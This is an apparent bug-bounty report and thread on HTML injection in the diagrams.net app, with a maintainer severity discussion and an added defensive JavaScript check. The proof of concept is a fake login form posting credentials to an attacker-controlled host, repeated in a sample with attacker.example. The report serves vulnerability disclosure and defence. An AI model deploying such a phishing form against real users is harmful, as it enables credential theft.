Html Injection in jgraph/drawio
Reported on
May 6th 2022
Description
https://app.diagrams.net/ is vulnerable to HTML injection by uploading an HTML file.
Proof of Concept
- Go to https://app.diagrams.net/, create a new HTML file with form fields and add this file to the project
- Now go to File > Embed > HTML and click Create; after that, click Preview. Here we will see that all our tags are rendered
- Now click on that form; it will open a new window with that form. Click the Print button
- Click Preview again to view the preview of the PDF; now you can enter a username and password and submit it
- The form is working
- Rather than showing the content of the HTML file, the site renders it as HTML, which leads to HTML injection. For example, if a file contains an h1 tag it should look like this: <h1>HTML tag</h1>, rather than being rendered
I have used this code for the login page PoC:
<html>
<body>
<h3>Login Form Post Method</h3>
<div class="main" style="overflow:auto">
<fieldset class="fieldset">
<!-- the form posts cross-domain to the attacker-controlled host -->
<form action="https://Attacker control Host" method="post">
<label for="username">Username:</label>
<input class="userbox" type="text" name="username" required="required" /><br />
<label for="password">Password:</label>
<input type="password" name="password" required="required" />
<input class="button" type="submit" value="submit" />
</form>
<p><a href="#">Forget Username?</a> | <a href="#">Forgot Password?</a></p>
</fieldset>
</div>
<p class="credit">Photo credit: More Than Me</p>
</body>
</html>
Impact
An attacker can trick a victim into rendering injected HTML in their browser.
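The two checks below are an added example written for this page; they are not draw.io / diagrams.net code and make no claim about how the project actually handles uploads. The first renders an uploaded file as text (so "<h1>HTML tag</h1>" is shown literally instead of interpreted), which is the behaviour the report says the preview page should have. The second answers the maintainer's question in the thread, "is the form post cross domain to any server?", by flagging every <form> whose action resolves to an origin other than the hosting page. The sample file and the host name attacker.example are constructed for the example.

```javascript
// Added example (not project code): text-render an uploaded file, and flag
// forms that post to a foreign origin, the phishing pattern from the PoC.

// Escape the characters that matter in HTML text and attribute context,
// so untrusted file content is displayed rather than parsed as markup.
function escapeHtml(untrusted) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(untrusted).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Return the absolute targets of <form> elements whose origin differs from
// hostOrigin. Relative actions resolve against the host and are same-origin;
// forms with no action attribute post back to the current page and are skipped.
function findCrossOriginFormActions(html, hostOrigin) {
  const host = new URL(hostOrigin);
  const formRe = /<form\b([^>]*)>/gi;
  const actionRe = /\baction\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/i;
  const results = [];
  for (const m of html.matchAll(formRe)) {
    const a = actionRe.exec(m[1]);
    if (!a) continue;
    const raw = a[1] ?? a[2] ?? a[3];
    let target;
    try {
      target = new URL(raw, hostOrigin); // relative paths resolve to the host
    } catch {
      continue; // unparsable action: nothing the browser could post to
    }
    if (target.origin !== host.origin) results.push(target.href);
  }
  return results;
}

// Constructed sample: a trimmed version of the login-form PoC above with a
// hypothetical attacker host, plus a relative-action form and an action-less
// form that must not be flagged.
const SAMPLE_FILE = `<html><body>
<h3>Login Form Post Method</h3>
<form action="https://attacker.example/collect" method="post">
  <input type="text" name="username" /><input type="password" name="password" />
  <input class="button" type="submit" value="submit" />
</form>
<form action="/save" method="post"><input type="submit" value="same-origin" /></form>
<form method="post"><input type="submit" value="no-action" /></form>
</body></html>`;

console.log(escapeHtml('<h1>HTML tag</h1>'));
console.log(findCrossOriginFormActions(SAMPLE_FILE, 'https://app.diagrams.net'));
```

Run with Node; the first line printed is the escaped tag and the second is the single cross-origin target. Regex extraction is deliberate here so the check runs without a DOM, but it only sees literal <form> tags; if the preview also executes scripts, a form built at runtime would not be caught, and the escaping path is the one that actually removes the issue.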
Thanks for the report. What is the version under the help menu at app.diagrams.net?
Would it be possible to format the report by bullet points to list each step at a time please? It's difficult to understand the exact steps in this format. Many thanks.
Hi, it's the latest version, 18.0.1, and you can find a detailed video here: https://youtu.be/fqk5jSzMRW4
Thanks for the detail. So, the form post is cross domain to any server?
Yes, it sends the request to an attacker-controlled domain.
Thanks, we were able to repeat the issue. I agree the issue is valid, though I'm not sure the severity is high. The steps necessary from the user to provoke this are fairly rare for most users to follow.
If someone from huntr reads, is there a bug taxonomy like https://bugcrowd.com/vulnerability-rating-taxonomy available?
Hi, thanks for your review, but since a user can share his work with other users, an attacker will create a whole template and share it with a user, so the user only has to go to the print page, where the attacker can host a proper phishing page with the POST method enabled cross-domain.
And this is how an attacker can increase the impact of this bug.
Hi, according to Bugcrowd it's a P3 medium-severity issue; you can change it to medium, thanks.
An attacker can even share the preview link with the victim, so there are no extra steps the victim has to do.
I’ve changed availability from high to none, since this doesn’t affect the availability of the system.
In terms of the integrity (impact on the integrity of the exploited system), note that draw.io / diagrams.net doesn’t have any concept of a login. A user isn’t going to think they are logging into the site because there is no login. Why do you believe there is a high effect on the system integrity?
Confidentiality describes the impact on the confidentiality of data processed by the system. There is no direct attack on data, since only the form contents can be extracted. The attack is around whether a user believes this is a real login screen, because they trust the domain. But I don’t see which login the user is being tricked into sending since we don’t have a site login. I think low is more appropriate in this case; it might even be none.
Would you agree with those changes?
We've ended up at a low following our process.
I see that moving the issue away from high meant the disclosure bounty went to zero. Our project pays out a minimum of 300USD (for low severity), so we will ensure you receive the 300USD if this is rated as a low.
I'm talking to huntr in the week about the funding process, we'll either make the payment to you via them or direct if that's not possible.
Hi, thanks for everything. I just want to know, can you assign a CVE for this?
@davidjgraph - regarding the taxonomy, we do not currently have this available, but I'd love to invite you to create a feature request, if you think it is important :)
I am speaking with huntr this week, I won't have any update until after I have spoken with them.
The increase to the bounty payment will come from Huntr, once our org is onboarded onto their systems.
Hello all 👋
The researcher bounty for this report has now been bumped from $0 to $300.
Congratulations @jo125ker 🤝
Hi @admin, can you please assign a CVE?
@davidjgraph - are you happy for us to proceed with assigning and publishing a CVE for this report?
@jamieslome Sure, I don't see any reason to not assign a CVE, unless you have a minimum severity. Is the report purely based on the original post?
@davidjgraph - we do not currently auto-assign CVEs for None or Low severities. However, if you could provide us with a CVSS vector string, we can go ahead and publish a CVE for this report 👍
OK, didn't see it was a low. Why a CVE for a low @gaurav-g2 ?